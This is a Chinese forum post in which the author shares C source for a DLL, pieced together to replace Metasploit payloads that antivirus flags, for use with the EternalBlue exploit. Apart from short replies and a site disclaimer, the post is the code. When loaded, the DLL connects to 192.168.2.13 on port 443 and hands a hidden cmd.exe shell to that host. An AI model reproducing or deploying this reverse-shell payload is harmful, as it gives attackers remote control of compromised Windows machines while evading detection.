前段时间,永恒之蓝 很火,msf生成的 dll 很容易被杀,网上找了一份反弹 的代码反弹代码拼凑了一个 dll反弹版
#pragma comment(lib,"Ws2_32.lib") #include <WinSock2.h> #include <stdlib.h> WSADATA wsaData; SOCKET Winsock; SOCKET Sock; struct sockaddr_in hax; STARTUPINFO ini_processo; PROCESS_INFORMATION processo_info; BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) { WSAStartup(MAKEWORD(2, 2), &wsaData); Winsock = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, (unsigned int)NULL, (unsigned int)NULL); hax.sin_family = AF_INET; hax.sin_port = htons(atoi("443")); hax.sin_addr.s_addr = inet_addr("192.168.2.13"); WSAConnect(Winsock, (SOCKADDR*)&hax, sizeof(hax), NULL); memset(&ini_processo, 0, sizeof(ini_processo)); ini_processo.cb = sizeof(ini_processo); ini_processo.dwFlags = STARTF_USESTDHANDLES; ini_processo.hStdInput = ini_processo.hStdOutput = ini_processo.hStdError = (HANDLE)Winsock; CreateProcessA(NULL, "cmd.exe", TRUE, CREATE_NO_WINDOW, (LPSTARTUPINFOA)&ini_processo, &processo_info); return TRUE; }
使用 gcc 编译(mingw ) 如下:
2 回复
我这边也找了好几个
@ver007 你也在这里啊
版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 dio@foxmail.com 举报,一经查实,本站将立刻删除。